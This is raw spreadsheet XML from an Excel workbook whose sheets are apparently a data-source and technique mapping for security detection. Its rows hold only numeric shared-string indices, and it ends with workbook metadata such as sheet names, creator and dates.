      <c r="F198" s="13" t="s">
        <v>1289</v>
      </c>
      <c r="G198" s="13" t="s">
        <v>959</v>
      </c>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A199" s="13" t="s">
        <v>285</v>
      </c>
      <c r="B199" s="13" t="s">
        <v>1290</v>
      </c>
      <c r="C199" s="13" t="s">
        <v>1291</v>
      </c>
      <c r="D199" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E199" s="13" t="s">
        <v>1292</v>
      </c>
      <c r="F199" s="13" t="s">
        <v>1293</v>
      </c>
      <c r="G199" s="13" t="s">
        <v>959</v>
      </c>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A200" s="13" t="s">
        <v>286</v>
      </c>
      <c r="B200" s="13" t="s">
        <v>1294</v>
      </c>
      <c r="C200" s="13" t="s">
        <v>1295</v>
      </c>
      <c r="D200" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E200" s="13" t="s">
        <v>1296</v>
      </c>
      <c r="F200" s="13" t="s">
        <v>1297</v>
      </c>
      <c r="G200" s="13" t="s">
        <v>1256</v>
      </c>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A201" s="13" t="s">
        <v>287</v>
      </c>
      <c r="B201" s="13" t="s">
        <v>1298</v>
      </c>
      <c r="C201" s="13" t="s">
        <v>1299</v>
      </c>
      <c r="D201" s="13" t="s">
        <v>557</v>
      </c>
      <c r="E201" s="13" t="s">
        <v>1300</v>
      </c>
      <c r="F201" s="13" t="s">
        <v>1301</v>
      </c>
      <c r="G201" s="13" t="s">
        <v>1256</v>
      </c>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="13" t="s">
        <v>288</v>
      </c>
      <c r="B202" s="13" t="s">
        <v>1302</v>
      </c>
      <c r="C202" s="13" t="s">
        <v>1303</v>
      </c>
      <c r="D202" s="13" t="s">
        <v>557</v>
      </c>
      <c r="E202" s="13" t="s">
        <v>1304</v>
      </c>
      <c r="F202" s="13" t="s">
        <v>1305</v>
      </c>
      <c r="G202" s="13" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A203" s="13" t="s">
        <v>289</v>
      </c>
      <c r="B203" s="13" t="s">
        <v>1306</v>
      </c>
      <c r="C203" s="13" t="s">
        <v>749</v>
      </c>
      <c r="D203" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E203" s="13" t="s">
        <v>1307</v>
      </c>
      <c r="F203" s="13" t="s">
        <v>1308</v>
      </c>
      <c r="G203" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="13" t="s">
        <v>290</v>
      </c>
      <c r="B204" s="13" t="s">
        <v>1309</v>
      </c>
      <c r="C204" s="13" t="s">
        <v>1310</v>
      </c>
      <c r="D204" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E204" s="13" t="s">
        <v>1311</v>
      </c>
      <c r="F204" s="13" t="s">
        <v>1312</v>
      </c>
      <c r="G204" s="13" t="s">
        <v>687</v>
      </c>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="13" t="s">
        <v>291</v>
      </c>
      <c r="B205" s="13" t="s">
        <v>1313</v>
      </c>
      <c r="C205" s="13" t="s">
        <v>1314</v>
      </c>
      <c r="D205" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E205" s="13" t="s">
        <v>1315</v>
      </c>
      <c r="F205" s="13" t="s">
        <v>1316</v>
      </c>
      <c r="G205" s="13" t="s">
        <v>687</v>
      </c>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A206" s="13" t="s">
        <v>292</v>
      </c>
      <c r="B206" s="13" t="s">
        <v>1317</v>
      </c>
      <c r="C206" s="13" t="s">
        <v>1001</v>
      </c>
      <c r="D206" s="13" t="s">
        <v>1072</v>
      </c>
      <c r="E206" s="13" t="s">
        <v>1318</v>
      </c>
      <c r="F206" s="13" t="s">
        <v>1319</v>
      </c>
      <c r="G206" s="13" t="s">
        <v>1320</v>
      </c>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="13" t="s">
        <v>293</v>
      </c>
      <c r="B207" s="13" t="s">
        <v>1321</v>
      </c>
      <c r="C207" s="13" t="s">
        <v>855</v>
      </c>
      <c r="D207" s="13" t="s">
        <v>1072</v>
      </c>
      <c r="E207" s="13" t="s">
        <v>1322</v>
      </c>
      <c r="F207" s="13" t="s">
        <v>1323</v>
      </c>
      <c r="G207" s="13" t="s">
        <v>810</v>
      </c>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A208" s="13" t="s">
        <v>294</v>
      </c>
      <c r="B208" s="13" t="s">
        <v>1324</v>
      </c>
      <c r="C208" s="13" t="s">
        <v>1325</v>
      </c>
      <c r="D208" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E208" s="13" t="s">
        <v>1326</v>
      </c>
      <c r="F208" s="13" t="s">
        <v>1327</v>
      </c>
      <c r="G208" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A209" s="13" t="s">
        <v>296</v>
      </c>
      <c r="B209" s="13" t="s">
        <v>1328</v>
      </c>
      <c r="C209" s="13" t="s">
        <v>526</v>
      </c>
      <c r="D209" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E209" s="13" t="s">
        <v>1329</v>
      </c>
      <c r="F209" s="13" t="s">
        <v>1330</v>
      </c>
      <c r="G209" s="13" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A210" s="13" t="s">
        <v>297</v>
      </c>
      <c r="B210" s="13" t="s">
        <v>1331</v>
      </c>
      <c r="C210" s="13" t="s">
        <v>1332</v>
      </c>
      <c r="D210" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E210" s="13" t="s">
        <v>1333</v>
      </c>
      <c r="F210" s="13" t="s">
        <v>1334</v>
      </c>
      <c r="G210" s="13" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A211" s="13" t="s">
        <v>299</v>
      </c>
      <c r="B211" s="13" t="s">
        <v>1335</v>
      </c>
      <c r="C211" s="13" t="s">
        <v>1336</v>
      </c>
      <c r="D211" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E211" s="13" t="s">
        <v>1337</v>
      </c>
      <c r="F211" s="13" t="s">
        <v>1338</v>
      </c>
      <c r="G211" s="13" t="s">
        <v>620</v>
      </c>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="13" t="s">
        <v>300</v>
      </c>
      <c r="B212" s="13" t="s">
        <v>1339</v>
      </c>
      <c r="C212" s="13" t="s">
        <v>1336</v>
      </c>
      <c r="D212" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E212" s="13" t="s">
        <v>1340</v>
      </c>
      <c r="F212" s="13" t="s">
        <v>1341</v>
      </c>
      <c r="G212" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="13" t="s">
        <v>301</v>
      </c>
      <c r="B213" s="13" t="s">
        <v>1342</v>
      </c>
      <c r="C213" s="13" t="s">
        <v>1343</v>
      </c>
      <c r="D213" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E213" s="13" t="s">
        <v>1344</v>
      </c>
      <c r="F213" s="13" t="s">
        <v>1345</v>
      </c>
      <c r="G213" s="13" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A214" s="13" t="s">
        <v>302</v>
      </c>
      <c r="B214" s="13" t="s">
        <v>1346</v>
      </c>
      <c r="C214" s="13" t="s">
        <v>1347</v>
      </c>
      <c r="D214" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E214" s="13" t="s">
        <v>1348</v>
      </c>
      <c r="F214" s="13" t="s">
        <v>1349</v>
      </c>
      <c r="G214" s="13" t="s">
        <v>571</v>
      </c>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A215" s="13" t="s">
        <v>303</v>
      </c>
      <c r="B215" s="13" t="s">
        <v>1350</v>
      </c>
      <c r="C215" s="13" t="s">
        <v>1351</v>
      </c>
      <c r="D215" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E215" s="13" t="s">
        <v>1352</v>
      </c>
      <c r="F215" s="13" t="s">
        <v>1353</v>
      </c>
      <c r="G215" s="13" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A216" s="13" t="s">
        <v>304</v>
      </c>
      <c r="B216" s="13" t="s">
        <v>1354</v>
      </c>
      <c r="C216" s="13" t="s">
        <v>1355</v>
      </c>
      <c r="D216" s="13" t="s">
        <v>1072</v>
      </c>
      <c r="E216" s="13" t="s">
        <v>1356</v>
      </c>
      <c r="F216" s="13" t="s">
        <v>1357</v>
      </c>
      <c r="G216" s="13" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="13" t="s">
        <v>305</v>
      </c>
      <c r="B217" s="13" t="s">
        <v>1358</v>
      </c>
      <c r="C217" s="13" t="s">
        <v>577</v>
      </c>
      <c r="D217" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E217" s="13" t="s">
        <v>1359</v>
      </c>
      <c r="F217" s="13" t="s">
        <v>1360</v>
      </c>
      <c r="G217" s="13" t="s">
        <v>794</v>
      </c>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A218" s="13" t="s">
        <v>306</v>
      </c>
      <c r="B218" s="13" t="s">
        <v>1361</v>
      </c>
      <c r="C218" s="13" t="s">
        <v>1362</v>
      </c>
      <c r="D218" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E218" s="13" t="s">
        <v>1363</v>
      </c>
      <c r="F218" s="13" t="s">
        <v>1364</v>
      </c>
      <c r="G218" s="13" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A219" s="13" t="s">
        <v>307</v>
      </c>
      <c r="B219" s="13" t="s">
        <v>1365</v>
      </c>
      <c r="C219" s="13" t="s">
        <v>577</v>
      </c>
      <c r="D219" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E219" s="13" t="s">
        <v>1366</v>
      </c>
      <c r="F219" s="13" t="s">
        <v>1367</v>
      </c>
      <c r="G219" s="13" t="s">
        <v>794</v>
      </c>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A220" s="13" t="s">
        <v>308</v>
      </c>
      <c r="B220" s="13" t="s">
        <v>1368</v>
      </c>
      <c r="C220" s="13" t="s">
        <v>1369</v>
      </c>
      <c r="D220" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E220" s="13" t="s">
        <v>1370</v>
      </c>
      <c r="F220" s="13" t="s">
        <v>1371</v>
      </c>
      <c r="G220" s="13" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="13" t="s">
        <v>309</v>
      </c>
      <c r="B221" s="13" t="s">
        <v>1372</v>
      </c>
      <c r="C221" s="13" t="s">
        <v>1373</v>
      </c>
      <c r="D221" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E221" s="13" t="s">
        <v>1374</v>
      </c>
      <c r="F221" s="13" t="s">
        <v>1375</v>
      </c>
      <c r="G221" s="13" t="s">
        <v>794</v>
      </c>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="13" t="s">
        <v>310</v>
      </c>
      <c r="B222" s="13" t="s">
        <v>1376</v>
      </c>
      <c r="C222" s="13" t="s">
        <v>1377</v>
      </c>
      <c r="D222" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E222" s="13" t="s">
        <v>1378</v>
      </c>
      <c r="F222" s="13" t="s">
        <v>1379</v>
      </c>
      <c r="G222" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="13" t="s">
        <v>311</v>
      </c>
      <c r="B223" s="13" t="s">
        <v>1380</v>
      </c>
      <c r="C223" s="13" t="s">
        <v>749</v>
      </c>
      <c r="D223" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E223" s="13" t="s">
        <v>1381</v>
      </c>
      <c r="F223" s="13" t="s">
        <v>1382</v>
      </c>
      <c r="G223" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A224" s="13" t="s">
        <v>312</v>
      </c>
      <c r="B224" s="13" t="s">
        <v>1383</v>
      </c>
      <c r="C224" s="13" t="s">
        <v>568</v>
      </c>
      <c r="D224" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E224" s="13" t="s">
        <v>1384</v>
      </c>
      <c r="F224" s="13" t="s">
        <v>1385</v>
      </c>
      <c r="G224" s="13" t="s">
        <v>794</v>
      </c>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A225" s="13" t="s">
        <v>1386</v>
      </c>
      <c r="B225" s="13" t="s">
        <v>1387</v>
      </c>
      <c r="C225" s="13" t="s">
        <v>497</v>
      </c>
      <c r="D225" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E225" s="13" t="s">
        <v>1388</v>
      </c>
      <c r="F225" s="13" t="s">
        <v>1389</v>
      </c>
      <c r="G225" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="13" t="s">
        <v>1390</v>
      </c>
      <c r="B226" s="13" t="s">
        <v>1391</v>
      </c>
      <c r="C226" s="13" t="s">
        <v>1392</v>
      </c>
      <c r="D226" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E226" s="13" t="s">
        <v>1393</v>
      </c>
      <c r="F226" s="13" t="s">
        <v>1394</v>
      </c>
      <c r="G226" s="13" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A227" s="13" t="s">
        <v>1395</v>
      </c>
      <c r="B227" s="13" t="s">
        <v>1396</v>
      </c>
      <c r="C227" s="13" t="s">
        <v>1397</v>
      </c>
      <c r="D227" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E227" s="13" t="s">
        <v>1398</v>
      </c>
      <c r="F227" s="13" t="s">
        <v>1399</v>
      </c>
      <c r="G227" s="13" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A228" s="13" t="s">
        <v>1400</v>
      </c>
      <c r="B228" s="13" t="s">
        <v>1401</v>
      </c>
      <c r="C228" s="13" t="s">
        <v>526</v>
      </c>
      <c r="D228" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E228" s="13" t="s">
        <v>1402</v>
      </c>
      <c r="F228" s="13" t="s">
        <v>1403</v>
      </c>
      <c r="G228" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A229" s="13" t="s">
        <v>1404</v>
      </c>
      <c r="B229" s="13" t="s">
        <v>1405</v>
      </c>
      <c r="C229" s="13" t="s">
        <v>1406</v>
      </c>
      <c r="D229" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E229" s="13" t="s">
        <v>1407</v>
      </c>
      <c r="F229" s="13" t="s">
        <v>1408</v>
      </c>
      <c r="G229" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A230" s="13" t="s">
        <v>1410</v>
      </c>
      <c r="B230" s="13" t="s">
        <v>1411</v>
      </c>
      <c r="C230" s="13" t="s">
        <v>1412</v>
      </c>
      <c r="D230" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E230" s="13" t="s">
        <v>1413</v>
      </c>
      <c r="F230" s="13" t="s">
        <v>1414</v>
      </c>
      <c r="G230" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A231" s="13" t="s">
        <v>1415</v>
      </c>
      <c r="B231" s="13" t="s">
        <v>1416</v>
      </c>
      <c r="C231" s="13" t="s">
        <v>1417</v>
      </c>
      <c r="D231" s="13" t="s">
        <v>1267</v>
      </c>
      <c r="E231" s="13" t="s">
        <v>1418</v>
      </c>
      <c r="F231" s="13" t="s">
        <v>1419</v>
      </c>
      <c r="G231" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A232" s="13" t="s">
        <v>1420</v>
      </c>
      <c r="B232" s="13" t="s">
        <v>1421</v>
      </c>
      <c r="C232" s="13" t="s">
        <v>1422</v>
      </c>
      <c r="D232" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E232" s="13" t="s">
        <v>1423</v>
      </c>
      <c r="F232" s="13" t="s">
        <v>1424</v>
      </c>
      <c r="G232" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A233" s="13" t="s">
        <v>1425</v>
      </c>
      <c r="B233" s="13" t="s">
        <v>1426</v>
      </c>
      <c r="C233" s="13" t="s">
        <v>1427</v>
      </c>
      <c r="D233" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E233" s="13" t="s">
        <v>1428</v>
      </c>
      <c r="F233" s="13" t="s">
        <v>1429</v>
      </c>
      <c r="G233" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A234" s="13" t="s">
        <v>1430</v>
      </c>
      <c r="B234" s="13" t="s">
        <v>1431</v>
      </c>
      <c r="C234" s="13" t="s">
        <v>1432</v>
      </c>
      <c r="D234" s="13" t="s">
        <v>1267</v>
      </c>
      <c r="E234" s="13" t="s">
        <v>1433</v>
      </c>
      <c r="F234" s="13" t="s">
        <v>1434</v>
      </c>
      <c r="G234" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A235" s="13" t="s">
        <v>1435</v>
      </c>
      <c r="B235" s="13" t="s">
        <v>1436</v>
      </c>
      <c r="C235" s="13" t="s">
        <v>1437</v>
      </c>
      <c r="D235" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E235" s="13" t="s">
        <v>1438</v>
      </c>
      <c r="F235" s="13" t="s">
        <v>1439</v>
      </c>
      <c r="G235" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A236" s="13" t="s">
        <v>1440</v>
      </c>
      <c r="B236" s="13" t="s">
        <v>1441</v>
      </c>
      <c r="C236" s="13" t="s">
        <v>1442</v>
      </c>
      <c r="D236" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E236" s="13" t="s">
        <v>1443</v>
      </c>
      <c r="F236" s="13" t="s">
        <v>1444</v>
      </c>
      <c r="G236" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="13" t="s">
        <v>1445</v>
      </c>
      <c r="B237" s="13" t="s">
        <v>1446</v>
      </c>
      <c r="C237" s="13" t="s">
        <v>1447</v>
      </c>
      <c r="D237" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E237" s="13" t="s">
        <v>1448</v>
      </c>
      <c r="F237" s="13" t="s">
        <v>1449</v>
      </c>
      <c r="G237" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="13" t="s">
        <v>1450</v>
      </c>
      <c r="B238" s="13" t="s">
        <v>1451</v>
      </c>
      <c r="C238" s="13" t="s">
        <v>681</v>
      </c>
      <c r="D238" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E238" s="13" t="s">
        <v>1452</v>
      </c>
      <c r="F238" s="13" t="s">
        <v>1453</v>
      </c>
      <c r="G238" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="13" t="s">
        <v>1454</v>
      </c>
      <c r="B239" s="13" t="s">
        <v>1455</v>
      </c>
      <c r="C239" s="13" t="s">
        <v>1456</v>
      </c>
      <c r="D239" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E239" s="13" t="s">
        <v>1457</v>
      </c>
      <c r="F239" s="13" t="s">
        <v>1458</v>
      </c>
      <c r="G239" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A240" s="13" t="s">
        <v>1459</v>
      </c>
      <c r="B240" s="13" t="s">
        <v>1460</v>
      </c>
      <c r="C240" s="13" t="s">
        <v>1461</v>
      </c>
      <c r="D240" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E240" s="13" t="s">
        <v>1462</v>
      </c>
      <c r="F240" s="13" t="s">
        <v>1463</v>
      </c>
      <c r="G240" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A241" s="13" t="s">
        <v>1464</v>
      </c>
      <c r="B241" s="13" t="s">
        <v>1465</v>
      </c>
      <c r="C241" s="13" t="s">
        <v>577</v>
      </c>
      <c r="D241" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E241" s="13" t="s">
        <v>1466</v>
      </c>
      <c r="F241" s="13" t="s">
        <v>1467</v>
      </c>
      <c r="G241" s="13" t="s">
        <v>1468</v>
      </c>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A242" s="13" t="s">
        <v>1469</v>
      </c>
      <c r="B242" s="13" t="s">
        <v>1470</v>
      </c>
      <c r="C242" s="13" t="s">
        <v>1471</v>
      </c>
      <c r="D242" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E242" s="13" t="s">
        <v>1472</v>
      </c>
      <c r="F242" s="13" t="s">
        <v>1473</v>
      </c>
      <c r="G242" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="13" t="s">
        <v>1474</v>
      </c>
      <c r="B243" s="13" t="s">
        <v>1475</v>
      </c>
      <c r="C243" s="13" t="s">
        <v>1476</v>
      </c>
      <c r="D243" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E243" s="13" t="s">
        <v>1477</v>
      </c>
      <c r="F243" s="13" t="s">
        <v>1478</v>
      </c>
      <c r="G243" s="13" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="13" t="s">
        <v>1479</v>
      </c>
      <c r="B244" s="13" t="s">
        <v>1480</v>
      </c>
      <c r="C244" s="13" t="s">
        <v>1481</v>
      </c>
      <c r="D244" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E244" s="13" t="s">
        <v>1482</v>
      </c>
      <c r="F244" s="13" t="s">
        <v>1483</v>
      </c>
      <c r="G244" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="13" t="s">
        <v>1484</v>
      </c>
      <c r="B245" s="13" t="s">
        <v>1485</v>
      </c>
      <c r="C245" s="13" t="s">
        <v>1481</v>
      </c>
      <c r="D245" s="13" t="s">
        <v>1486</v>
      </c>
      <c r="E245" s="13" t="s">
        <v>1487</v>
      </c>
      <c r="F245" s="13" t="s">
        <v>1488</v>
      </c>
      <c r="G245" s="13"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DataSourceEvents</vt:lpstr>
      <vt:lpstr>RatingLegend</vt:lpstr>
      <vt:lpstr>Knowledge base</vt:lpstr>
      <vt:lpstr>TechniqueDataSourceWeights</vt:lpstr>
      <vt:lpstr>REF-DataSources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Hartong</dc:creator>
  <cp:lastModifiedBy>homerus</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-27T13:18:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-30T19:52:53Z</dcterms:modified>
</cp:coreProperties>
</file>